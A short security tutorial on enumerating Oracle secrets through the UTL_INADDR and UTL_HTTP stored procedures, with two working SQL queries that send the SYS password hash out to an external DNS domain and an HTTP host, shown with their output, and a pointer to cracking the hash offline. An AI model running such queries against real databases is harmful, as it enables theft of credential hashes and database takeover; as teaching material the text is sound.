DNS/HTTP Enumeration

Oracle has a couple of stored procedures that can be manipulated to enumerate sensitive application system information. You are basically using Oracles in-built web services against itself.  This was demonstrated at the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software.  The procedures in question are:

• UTL_HTTP.REQUEST

• UTL_INADDR.GET_HOST_ADDRESS

Abusing normal DNS and HTTP requests from a normal SQL prompt it may be possible to gain passwords hashes etc:

SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US
ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM
E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
*
ERROR at line 1:
ORA-29257: host D3AAEDA7EDA1B4AA.vulnerabilityassessment.co.uk unknown
ORA-06512: at "SYS.UTL_INADDR", line 19
ORA-06512: at "SYS.UTL_INADDR", line 40
ORA-06512: at line 1

and

SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_U
SERS WHERE USERNAME='SYS')) from dual;

UTL_HTTP.REQUEST('HTTP://GLADIUS:5500/'||(SELECTPASSWORDFROMDBA_USERSWHEREUSERNA

--------------------------------------------------------------------------------

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>Resou

rce /D3AAEDA7EDA1B4AA not found on this server</BODY></HTML>

In both examples above the SYS password is very nicely provided to us which can then be cracked offline with tools such as Cain etc.